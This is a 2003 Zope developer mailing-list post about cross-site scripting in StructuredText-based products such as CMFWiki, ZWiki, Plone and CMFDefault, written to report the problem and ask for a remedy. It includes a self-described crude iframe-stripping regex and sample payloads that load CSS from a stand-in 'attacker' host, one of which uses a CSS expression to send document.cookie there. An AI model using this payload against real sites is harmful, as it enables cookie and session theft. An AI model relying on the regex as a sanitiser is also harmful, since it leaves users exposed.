[Zope-dev] weak examples, weak exploits
Kazuya FUKAMACHI
kf@atransia.co.jp
Tue, 24 Jun 2003 00:30:55 +0900
On Mon, 23 Jun 2003 01:20:35 -0700
Jamie Heilman <jamie@audible.transient.net> wrote:
> http://exploitlabs.com/files/advisories/EXPL-A-2003-009-zope.txt
[snip]
> apps, and apart from 1 and 3 there are probably legitimate bugs there.
related issues:
CMFWiki, ZWiki, Plone and other products are also vulnerable to 3a,
as far as the site permits to anonymous users or person without good
references to write.
To cope with the matter, I stupidly put multiple string substitution.
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
t = re.sub(r'(?i)<([^d>]*iframe[^>]*)>',r'<disabled \1>',t)
It would be appreciated if someone advices me more general
and smart way.
I know that Zope's StructuredText itself does not handle such a case,
and that kind of implementaition may be left to each developer.
If it had ability to avoid them, it would be much better, I think.
Another example
Following sample may allow malicious.css import from outside
of the site. Put #1 or #2 to a StructuredText page.
#1
<LINK rel="stylesheet" href="http://attacker/malicious.css">
#2
<STYLE type="text/css">
@import url('http://attacker/malicious.css');
</STYLE>
# expample of malicious.css
http://attacker/malicious.css
body { left: expression(eval(
'document.location="http://attacker/"+document.cookie;')) }
For example, make a 'Document' in a CMFDefault site,
and put #1 to the reply form, DiscussionItem, against the original
document, etc. It seems CMFDefault is vulnerable to this attack.
Any general remedy for that kind of exploit?
--
Kazuya Fukamachi